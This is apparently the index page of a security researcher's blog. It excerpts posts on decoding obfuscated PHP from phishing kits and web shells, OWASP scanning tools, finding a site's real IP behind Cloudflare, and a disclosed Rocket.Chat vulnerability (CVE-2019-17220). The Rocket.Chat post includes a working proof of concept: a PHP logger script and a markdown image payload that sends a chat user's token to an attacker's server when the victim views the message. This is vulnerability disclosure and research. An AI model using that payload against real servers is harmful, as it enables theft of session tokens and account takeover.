2024-08-13

3H34N Flipper Zero Board (Three in One – CC1101/NRF24L01/ESP32)

 3H34N Flipper Zero Board (Three in One – CC1101/NRF24L01/ESP32)

3H34N Flipper Zero Board (Three in One – CC1101/NRF24L01/ESP32)

I'm thrilled to announce that the PCB for the Flipper Zero board has been successfully completed. This design integrates three modules into a single board.
Read more »
No comments:

2022-10-27

"iServer/Powered By iSender Team" decoder

When your iPhone is lost, some hackers provide a fake website like Apple and message you on WhatsApp or some social media to reset your password to unlock your iPhone and Disable "find my iPhone".

I checked and decoded some fake website scripts that steal iCloud data from a script and are encoded by a custom PHP encoder called "iServer/Powered By iSender Team". 

decoder: 
<?php
/*
 * Script to decrypt files encoded with iServer/Powered By iSender Team
*/

header('Content-type: text/html; charset=utf-8');

// Your encoded file path
$file = '/home/user/file.php';

/**
 * Return string after needle if it exists.
 */
function str_after($str, $needle, $last_occurence = false)
{
    $pos = strpos($str, $needle);

    if ($pos === false) return $str;

    return ($last_occurence === false)
        ? substr($str, $pos + strlen($needle))
        : substr($str, strrpos($str, $needle) + 1);
}

// get file content
$content = file_get_contents($file);

// split the eval section
$eval_code = str_after($content, "eval(");
$eval_code1 = strstr($eval_code, ")))", true);

// get first value
$value1 = str_after($eval_code1, "','"); //gets all text from needle on
$value2 = strstr($value1, "',", true); //gets all text before needle

// get two value
$value3 = str_after($value1, "','"); //gets all text from needle on
$value4 = strstr($value3, "'", true); //gets all text before needle

// decode the file
$myfile = file(str_replace('\\', '/', $file));
$file_ap = array_pop($myfile);
echo (base64_decode(strtr($file_ap, $value2, $value4)));
Read more »
No comments:

2020-08-18

How Hackers Be Victim: Backdoor in PHP web shells

I decided to decode a PHP web shell that encoded by Fopo online encoder, it called "ATTACK SHELL PRiV9" or "K2ll33d Shell 2019" belong to "r00t.info".

PHP web shell:

Read more »
No comments:

2020-06-07

OWASP JoomScan Project in Pentestmag

our article published in Pentestmag




OWASP JoomScan Project
by Mohammad Reza Espargham, Ali Razmjoo, and Ehsan Nezami
JoomScan is not aiming just at testing different vulnerabilities and trying to simulate attacks, the process always begins with information gathering and it proceeds step by step following ethical hacking techniques. The information-gathering phase is not limited to the web application but also the webserver and domain, also misconfigurations, human-errors, and different possible risks on the product.

https://lnkd.in/dcwRNvD
other contributors Valerio Alessandroni, Marlene Ladendorff, PhD, Dr. Chuck Easttom, Daniel Benicio F Alves, LPIC, SUSE SCA, FORTINET NSE3, Kavya Pearlman ⚠️ Safety First ⚠️, Alex Halfin, Vinícius Vieira, Mostafa Mahmoud, Mohammad Reza Espargham, Ali Razmjoo, Ehsan Nezami, Ofer Tirosh, and Franciny S. pentest magazine pentestmag ActiveDirectory AD pentesting DDoS MachineLearning Splunk engineering new edition cybersecurity infosecurity infosec
No comments:

2019-10-02

Rocket.Chat Cross Site Scripting CVE-2019-17220

Rocket.Chat versions prior to 2.1.0 suffer from a cross-site scripting vulnerability.

 As I found out, the service has a security problem that will lead to the disclosure of user information.

 Packet Storm
Mitre CVE
NIST
Exploit-DB



 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat < 2.1.0
# CVE: CVE-2019-17220
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)

1. Create l33t.php on a web server 


<?php
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

2. Open a chat session
3. Send payload with your web server url


![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

4. Token will be written in logs.txt when target seen your message.
30 comments:

2019-04-12

OWASP Honeypot

In our first test of the OWASP Honeypot with Ali Razmjoo, I am gonna say that among all attacks we are receiving, Russians are doing it smarter and more effective

 API: API Docs:






No comments:

Black Hat Asia 2019

Our OWASP Nettacker: Automated Penetration Testing Framework has been accepted for Black Hat Asia Arsenal 2019.

https://www.blackhat.com/asia-19/arsenal/schedule/index.html#owasp-nettacker-automated-penetration-testing-framework-14336


Read more »
No comments:

2018-11-10

Bypass Cloudflare To Get Real IP Address

What is CloudFlare

CloudFlare is one of the fastest growing CDN providers, which has free and premium service to accelerate, optimize & secure websites. There are more than 2,000,000 web properties powered by CloudFlare and I use their service too. If you are already using CloudFlare then you might have noticed IP address in DNS lookup get reflected with CloudFlare.

How this script works

this script is designed to discover the origin IP of a server that is behind Cloudflare,The work method of this script is to scan the NS of a domain,This tool only works to domains that are the domains of the original NS server This tool scans the default Private Name Server, and if they exist, they will find the original server IP

Read more »
8 comments:

2018-11-09

PHP Decoder "Encoding by TeleAgent.IR - ResellerCenter.IR"

This script will help you to decode files coded as "Encoding by TeleAgent.IR - ResellerCenter.IR".
For more detailed look here :


<?php //MS4w
/* ---------------------------------------------------------------------------------
-  PHP Encoding by TeleAgent.IR - ResellerCenter.IR  -
-  PHP Encoder Version      : 1.0                                                  -
-  This code was created on : 2018/10/01 at 13:00                                  -
-  Checksum                 : 6fj65a682a445d8cb5734720ed67dae2                     -
---------------------------------------------------------------------------------- */
$_CLHHKEE=__FILE__;$_NQRSZPKB=__LINE__;$_CHDAOJMPYXT=__DIR__ ;$_FNMHVDO=__FUNCTION__;
function I1IIIIIII11I1II() {return __CLASS__;}function I1IIIIIII() {return __LINE__;}
$_CSYPWGZ=__CLASS__;$_TTBLNSD=__TRAIT__ ;$_MDGRSQS=__METHOD__ ;$_NEVYW=__NAMESPACE__;
function I1IIIIIII1II() {return __FUNCTION__;}function I1I1IIII() {return __TRAIT__;}
function I1IIIIIII11I11II() {return __FILE__;}function I1III1IIII() {return __DIR__;}
function I1III11I1I() {return __METHOD__;}function I1II1III() {return __NAMESPACE__;}
$_QXXCZD="\142\141\163\x65\x36\64\137\144\145\x63\157\x64\145";@echo("?>".$_QXXCZD("PD9waHAgJF9.

Download script 
To execute this script, just execute it and give it your path.
Enjoy. 
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
'''
    File name: PHP Decoder "Encoding by TeleAgent.IR - ResellerCenter.IR".py
    Author: Ehsan Nezami
    Date created: 19/11/2018
    Web: http://nezami.me/
    Python Version: 2.7
'''

import os
import re
import base64
import zlib

def listFiles(path, extension):
    return [f for f in os.listdir(path) if f.endswith(extension)]

path_name = raw_input("What is your path of php files? \n Example : C:\\files\\ \n ")
for files in listFiles(path_name, '.php'):
    print files
        
    start = '$_QXXCZD("'
    end = '"));'
    
    f=open(files,'r')
    for input in f.readlines():
        data= re.findall(re.escape(start)+"(.*)"+re.escape(end),input)
        for x in data:
            x=base64.b64decode(x)
    
            start1 = '.$_ZUI("'
            end1 = '"));'
            data1= re.findall(re.escape(start1)+"(.*)"+re.escape(end1),x)
            for x1 in data1:
                x1=base64.b64decode(x1)
                start2 = '$_IRRGRHMF("'
                end2 = '"));'
                data2= re.findall(re.escape(start2)+"(.*)"+re.escape(end2),x1)
    
                for x2 in data2:
                    x2=base64.b64decode(x2)
                    start3 = '$_EFTYPYA("'
                    end3 = '"));'
                    data3= re.findall(re.escape(start3)+"(.*)"+re.escape(end3),x2)
    
                    for x3 in data3:
                        x3=base64.b64decode(x3)
                        start4 = '$_AOKDOJCRH("'
                        end4 = '"));'
                        data4= re.findall(re.escape(start4)+"(.*)"+re.escape(end4),x3)
    
                        for x4 in data4:
                            x4=base64.b64decode(x4)
    
                            start5 = '$_NZHLDCOUMASYWHUKYETFVEDDJELK("'
                            end5 = '")));'
                            data5= re.findall(re.escape(start5)+"(.*)"+re.escape(end5),x4)
                            for x5 in data5:
                                compressed = base64.b64decode(x5)
                                decoded=zlib.decompress(compressed, -15)
                                print decoded
                                output=file('dec-'+files,'a')
                                output.write(decoded)
Read more »
5 comments:
Subscribe to: Posts (Atom)